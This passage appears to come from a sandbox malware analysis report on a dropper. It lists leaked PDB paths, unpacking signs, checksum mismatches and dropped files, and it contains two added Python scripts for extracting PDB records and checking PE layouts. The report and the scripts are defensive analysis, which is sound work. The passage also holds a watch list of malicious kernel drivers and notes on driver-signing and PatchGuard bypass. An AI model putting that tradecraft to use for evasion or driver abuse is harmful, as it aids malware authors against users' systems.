                        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Unable to locate the .pdb file in this location source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: The module signature does not match with .pdb signature. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: .pdb.dbg source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: '(EfiGuardDxe.pdbx source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003ED8000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: or you do not have access permission to the .pdb location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: EfiGuardDxe.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
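                        The PDB paths listed above are recovered by scanning memory dumps for printable strings that end in .pdb, which is why dbghelp's own error messages ("Cvinfo is corruptThe .pdb file ...") appear next to real linker paths such as WinRing0.pdb and EfiGuardDxe.pdb. The script below is an added example and not part of the Joe Sandbox report: it does the same loose scan, additionally parses proper RSDS CodeView records (GUID, age, path, and the key a symbol-server lookup would use, as in the symsrv strings above), and separates build paths from message text. The dump fragment, the GUID and the watch-list notes are constructed here from the names this report lists; the watch list itself is my assumption.

```python
"""Pull PDB paths out of a memory dump or file the way the report's
"Binary string: ...pdb" findings do, plus proper RSDS CodeView records.
Added example (not Joe Sandbox code); the blob below is constructed."""
import re
import struct
import uuid

# Printable ASCII run ending in ".pdb": the loose scan behind the report's "Binary string" hits.
PDB_RE = re.compile(rb"[\x20-\x7e]{1,300}\.pdb")

# Assumed watchlist built from the PDB names this report lists (basenames, lower-case).
WATCHLIST = {
    "winring0.pdb": "WinRing0: ring-0 MSR/port-I/O driver shipped with XMRig",
    "efiguarddxe.pdb": "EfiGuard: UEFI driver that disables PatchGuard and driver signature enforcement",
    "vboxdrv.pdb": "VBoxDrv: old VirtualBox driver with a known DSE-bypass history",
    "winmon.pdb": "Winmon: kernel driver name associated with Glupteba in public analyses",
    "winmonfs.pdb": "WinmonFS: file-system driver name associated with Glupteba in public analyses",
    "winmonprocessmonitor.pdb": "WinmonProcessMonitor: driver name associated with Glupteba in public analyses",
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def extract_rsds(blob):
    """Parse every RSDS CodeView record: 'RSDS' + GUID (little-endian) + age + NUL-terminated path.
    symsrv_key is the path a symbol-server lookup would request for this record."""
    records = []
    pos = blob.find(b"RSDS")
    while pos != -1:
        path_start = pos + 24
        end = blob.find(b"\0", path_start)
        path = blob[path_start:end if end != -1 else len(blob)]
        if path.lower().endswith(b".pdb") and all(0x20 <= c < 0x7F for c in path):
            guid = uuid.UUID(bytes_le=blob[pos + 4:pos + 20])
            age = struct.unpack_from("<I", blob, pos + 20)[0]
            name = basename(path.decode("ascii"))
            records.append({"path": path.decode("ascii"), "guid": str(guid), "age": age,
                            "symsrv_key": f"{name}/{guid.hex.upper()}{age:X}/{name}"})
        pos = blob.find(b"RSDS", pos + 4)
    return records


def extract_pdb_strings(blob):
    """Loose scan; it also catches names embedded in dbghelp messages, hence classify()."""
    return sorted({m.group().decode("ascii") for m in PDB_RE.finditer(blob)})


def classify(hit):
    if "\\" in hit or "/" in hit:
        return "build-path"      # full linker output path, often leaks project and user names
    if " " not in hit:
        return "bare-name"       # just a file name, e.g. a debug-directory entry without a directory
    return "message"             # prose that happens to mention .pdb (dbghelp/symsrv strings)


def watchlist_hits(hits):
    out = []
    for hit in hits:
        note = WATCHLIST.get(basename(hit).lower())
        if note:
            out.append((hit, note))
    return out


def make_rsds(guid, age, path):
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode("ascii") + b"\0"


# Constructed dump fragment echoing the report's findings (GUID and age are made up).
SAMPLE = (
    b"\0" * 8
    + make_rsds(uuid.UUID("12345678-1234-5678-1234-567812345678"), 1,
                r"d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb")
    + b"\0EfiGuardDxe.pdb\0"
    + b"C:\\Users\\Admin\\documents\\visual studio 2015\\Projects\\Winmon\\Release\\Winmon.pdb\0"
    + b"Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information.\0"
    + b"Unrecognized pdb format\0"
)

if __name__ == "__main__":
    for rec in extract_rsds(SAMPLE):
        print("RSDS", rec)
    for hit in extract_pdb_strings(SAMPLE):
        print(classify(hit), hit)
    for hit, note in watchlist_hits(extract_pdb_strings(SAMPLE)):
        print("WATCH", hit, "->", note)
```

                        Run it against a raw memory dump or a dropped file (for example the .sys written to C:\Windows\Temp) by replacing SAMPLE with the file's bytes; the RSDS records are the reliable ones, the loose hits are leads to check against the watch list.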

                        Data Obfuscation

                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Unpacked PE file: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Unpacked PE file: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Unpacked PE file: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Unpacked PE file: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack
                        Source: 288c47bbc1871b439df19ff4df68f076.exe.0.dr | Static PE information: real checksum: 0x420b8d should be: 0x42c6e2
                        Source: vueqjgslwynd.exe.4.dr | Static PE information: real checksum: 0x0 should be: 0x29585f
                        Source: BroomSetup.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x4cbbf8
                        Source: FourthX.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x29585f
                        Source: InstallSetup4.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x20eded
                        Source: 25C1.exe | Static PE information: real checksum: 0x0 should be: 0x8be514
                        Source: INetC.dll.3.dr | Static PE information: real checksum: 0x0 should be: 0x69a0
                        Source: FourthX.exe.0.dr | Static PE information: section name: .00cfg
                        Source: BroomSetup.exe.3.dr | Static PE information: section name: .didata
                        Source: vueqjgslwynd.exe.4.dr | Static PE information: section name: .00cfg
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 2_2_02834C85 pushad ; ret 2_2_02834C97
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 2_2_02834D61 pushad ; ret 2_2_02834D88
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 2_2_0283216B pushfd ; ret 2_2_028321B3
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | Code function: 4_2_00007FF69A531394 push qword ptr [00007FF69A53A004h]; ret 4_2_00007FF69A531403
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Code function: 27_2_00007FF7EE4A1394 push qword ptr [00007FF7EE4AA004h]; ret 27_2_00007FF7EE4A1403
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 32_2_029A2C85 pushad ; ret 32_2_029A2C97
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 32_2_029A016B pushfd ; ret 32_2_029A01B3
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 32_2_029A2D61 pushad ; ret 32_2_029A2D88
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Code function: 32_1_00404EBD push ecx; ret 32_1_00404ED0
                        Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000000140001394 push qword ptr [0000000140009004h]; ret 37_2_0000000140001403
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 41_2_009842C8 push ebx; ret 41_2_009842DA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 41_2_00985900 push esp; ret 41_2_00985909
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 41_2_00983AD9 push ebx; retf 41_2_00983ADA
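                        Two of the findings in this section are plain static checks: the section layout of the on-disk file against the unpacked image (the dump gains .idata, .reloc and a Go-style .symtab section, with .idata writable), and the optional-header CheckSum field, which the report prints as "real checksum" next to the value it recomputes. The script below is an added example, not Joe Sandbox code. It builds two constructed PE32+ images that mirror the packed and unpacked layouts reported for 288c47bbc1871b439df19ff4df68f076.exe, diffs them, and recomputes the CheckSum with the standard algorithm; it needs only the Python standard library.

```python
"""Static checks behind the report's Data Obfuscation findings: section rights, a
packed-vs-unpacked layout diff, and the optional-header CheckSum. Added example,
not Joe Sandbox code; the PE images are constructed in code (standard library only)."""
import struct

CODE, DATA = 0x00000020, 0x00000040             # IMAGE_SCN_CNT_CODE / IMAGE_SCN_CNT_INITIALIZED_DATA
E, R, W = 0x20000000, 0x40000000, 0x80000000    # IMAGE_SCN_MEM_EXECUTE / _READ / _WRITE
FILE_ALIGN = 0x200

def build_sample_pe(sections, checksum=0):
    """Constructed minimal PE32+: DOS header, NT headers, one raw page per section.
    Only fields read by the checks below are filled in; test data, not a loadable image."""
    opt_size = 240                              # PE32+ optional header with 16 data directories
    hdr_len = 64 + 4 + 20 + opt_size + 40 * len(sections)
    hdr_aligned = -(-hdr_len // FILE_ALIGN) * FILE_ALIGN
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)       # PE32+ magic
    struct.pack_into("<I", opt, 36, FILE_ALIGN) # FileAlignment
    struct.pack_into("<I", opt, 60, hdr_aligned)  # SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum (the report's "real checksum")
    struct.pack_into("<I", opt, 108, 16)        # NumberOfRvaAndSizes
    sec_hdrs, bodies = b"", b""
    for i, (name, chars) in enumerate(sections):
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), FILE_ALIGN,
                                0x1000 * (i + 1), FILE_ALIGN, hdr_aligned + i * FILE_ALIGN, 0, 0, 0, 0, chars)
        bodies += (name.encode() * FILE_ALIGN)[:FILE_ALIGN]
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec_hdrs).ljust(hdr_aligned, b"\0") + bodies

def parse_pe(data):
    """Section (name, characteristics) pairs, the stored CheckSum and the field's file offset."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24
    if struct.unpack_from("<H", data, opt_off)[0] not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    checksum_off = opt_off + 64                 # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        sections.append((f[0].rstrip(b"\0").decode("ascii", "replace"), f[9]))
    return {"sections": sections, "checksum_offset": checksum_off,
            "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0]}

def rights(chars):
    """E/R/W letters for the MEM_EXECUTE/READ/WRITE bits (the report abbreviates .data to W)."""
    return "".join(letter for letter, bit in (("E", E), ("R", R), ("W", W)) if chars & bit)

def section_layout(data):
    return [(name, rights(chars)) for name, chars in parse_pe(data)["sections"]]

def layout_changes(packed, unpacked):
    """Diff on-disk vs. dumped layout; new sections or changed rights is the
    'changes PE section rights' unpacking signal the report raises."""
    before, after = dict(section_layout(packed)), dict(section_layout(unpacked))
    return {"added": sorted(set(after) - set(before)),
            "removed": sorted(set(before) - set(after)),
            "changed": sorted(n for n in before if n in after and before[n] != after[n])}

def compute_checksum(data, checksum_off):
    """PE CheckSum as CheckSumMappedFile computes it: dword sum with end-around carry,
    skipping the CheckSum field itself, folded to 16 bits, plus the file length."""
    padded = bytes(data) + b"\0" * (-len(data) % 4)
    total = 0
    for idx in range(len(padded) // 4):
        if idx == checksum_off // 4:
            continue
        total += struct.unpack_from("<I", padded, idx * 4)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def checksum_status(data):
    """(stored, computed): 0 stored means the linker wrote none; a non-zero
    stored value that disagrees means the bytes changed after linking."""
    info = parse_pe(data)
    return info["stored_checksum"], compute_checksum(data, info["checksum_offset"])

def fix_checksum(data):
    out, info = bytearray(data), parse_pe(data)
    struct.pack_into("<I", out, info["checksum_offset"], compute_checksum(data, info["checksum_offset"]))
    return bytes(out)

# Constructed layouts mirroring the report's packed vs. unpacked 288c47bbc1871b439df19ff4df68f076.exe.
PACKED = build_sample_pe([(".text", CODE | E | R), (".rdata", DATA | R), (".data", DATA | R | W), (".rsrc", DATA | R)])
UNPACKED = build_sample_pe([(".text", CODE | E | R), (".rdata", DATA | R), (".data", DATA | R | W),
                            (".idata", DATA | R | W), (".reloc", DATA | R), (".symtab", DATA | R)])
```

                        Calling layout_changes(PACKED, UNPACKED) reports .idata, .reloc and .symtab as added and .rsrc as removed, which is the same picture as the Unpacked PE file lines above. On the checksum: a stored value of 0 only means the linker never wrote one (common outside Microsoft toolchains) and is weak evidence by itself; the stronger signal is a non-zero stored value that disagrees with the recomputed one, as for 288c47bbc1871b439df19ff4df68f076.exe.0.dr (0x420b8d vs 0x42c6e2), which means the bytes were changed after linking.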

                        Persistence and Installation Behavior

                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | File created: C:\Windows\TEMP\gbfbijmbpkdw.sys
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exe | File created: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | File created: C:\Windows\Temp\gbfbijmbpkdw.sys
                        Source: C:\Users\user\Desktop\25C1.exe | File created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                        Source: C:\Users\user\Desktop\25C1.exe | File created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
